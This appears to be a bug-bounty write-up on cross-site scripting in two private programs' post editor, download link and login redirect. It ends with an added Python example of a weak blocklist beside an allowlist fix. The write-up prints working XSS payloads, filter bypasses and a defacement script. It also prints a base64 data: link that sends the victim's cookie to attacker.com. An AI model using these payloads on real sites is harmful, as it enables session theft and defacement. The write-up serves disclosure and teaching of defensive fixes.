Journey To The XSS

Saad Ahmed
4 min read, May 19, 2018


Hi, it's been a long time since I did a write-up, so this post is all about the XSS I found in two different private programs. Let's get started.

So the first program has a feature like this, where we can put in some HTML code and try for XSS.

I tried different methods and every possible event handler to get XSS, but the program was checking everything properly and stripping anything that started with the "on" keyword.

The one thing that came to mind was to try XSS on links, so the next payload was
<a href="javascript:alert(1)">xD</a>
and boom, the XSS popped. This is the compose-post area where we write a post and then publish it so other users can see it, so anyone who clicks the link gets the XSS popup.

I reported the issue to the program and they quickly fixed it. I then tried to bypass the filter and noticed that they were checking for javascript: in the href and escaping it if it was there. I tried different methods, like URL encoding and &colon; instead of :, but none of them worked. Then I did some googling and found this payload:
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pO3dpbmRvdy5sb2NhdGlvbj0naHR0cHM6Ly9hdHRhY2tlci5jb20vJytkb2N1bWVudC5jb29raWU8L3NjcmlwdD4=">test</a>

I used this payload, it worked, and I was able to steal the user's cookie with it. I reported this to the program again and they fixed it. When I checked again, they had applied the same fix as for javascript:, and were now checking for both data: and javascript:. I tried to bypass that and didn't expect the bypass to be so easy; I just figured the program was checking it like this:

If we just make any letter in the payload capital, it works. I tried this and boom, it worked; the same with data:, and that worked too. I reported this to the program and got $500 for all 4 XSS.

So the second program has a URL like this:
https://PRIVATE.com/?url=[URL]
It's a download link which is rendered in the webpage.

If you click on **Click here if the download doesn't start in several seconds.** it goes to the URL in the url parameter, so I changed it to javascript:alert(1), also used the data: payload here, and it worked on the first attempt :D

The url parameter lands in a href="[URL]", so I tried to inject another attribute to break out of href="", but that was being checked properly. Then by mistake I entered "</><h1>ss</h1> and boom, HTML injected.

After that I tried to do something more with this, and why not a defacement :D
My next payload was

"</><script>document.getElementsByTagName("body")[0].innerHTML = "<h1 style='font-size:113px;'><br>Inside The B0x!!</h1>";</script>

The payload first grabs the <body> tag and replaces its entire HTML with <h1 style='font-size:113px;'><br>Inside The B0x!!</h1>

The second XSS on that program is in this URL:
https://PRIVATE.com/account/login?redirectURL=PRIVATE/accoun/edit-profile

If the user enters valid credentials, it redirects to the URL given in the redirectURL parameter, so I just tried the luckiest payload, javascript:alert(1), and bo0m

https://PRIVATE.com/account/login?redirectURL=javascript:alert(1)

Now when the user enters their credentials, the XSS pops up.
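All three filters in this post (the href check that missed a capitalised javascript:, the url= parameter, and redirectURL) share one root cause: a case-sensitive blocklist applied to a value the browser normalises before reading the scheme. The following is an added example, not code from the post or from either program, showing that weak check beside an allowlist version in Python; the function names and the normalisation steps are my own assumptions about how such a check would be written.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# Control characters and whitespace that browsers drop from a URL before
# reading its scheme, so "java\tscript:" is still executed as javascript:.
_STRIP = re.compile(r"[\x00-\x20\x7f]")

ALLOWED_SCHEMES = {"http", "https"}


def weak_is_safe_href(url: str) -> bool:
    """Case-sensitive blocklist like the one the post describes.
    It passes 'Javascript:alert(1)' and 'DATA:' untouched."""
    return not (url.startswith("javascript:") or url.startswith("data:"))


def normalize_href(raw: str) -> str:
    """Approximate what the browser sees: decode HTML entities (so
    &colon; becomes :), percent-decode, drop control chars, lowercase.
    Decoding more than the browser would is acceptable here; it only
    makes the check stricter."""
    value = html.unescape(raw)
    value = unquote(value)
    value = _STRIP.sub("", value)
    return value.lower()


def is_safe_href(raw: str) -> bool:
    """Allowlist: accept only absolute http(s) URLs and same-site
    relative links; every other scheme is rejected, whatever its case."""
    value = normalize_href(raw)
    scheme = urlsplit(value).scheme
    if scheme == "":
        # Relative link such as "/posts/1"; reject protocol-relative "//host".
        return not value.startswith("//")
    return scheme in ALLOWED_SCHEMES


def safe_redirect_target(raw: str, default: str = "/") -> str:
    """For a post-login redirect parameter, honour only a same-site path.
    javascript:, data:, absolute and protocol-relative URLs fall back to
    the default page instead of being followed."""
    value = normalize_href(raw)
    if re.match(r"^/(?![/\\])", value):
        return value
    return default
```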

Hope you guys like it, and sorry for bad English :P

./Logout ;)
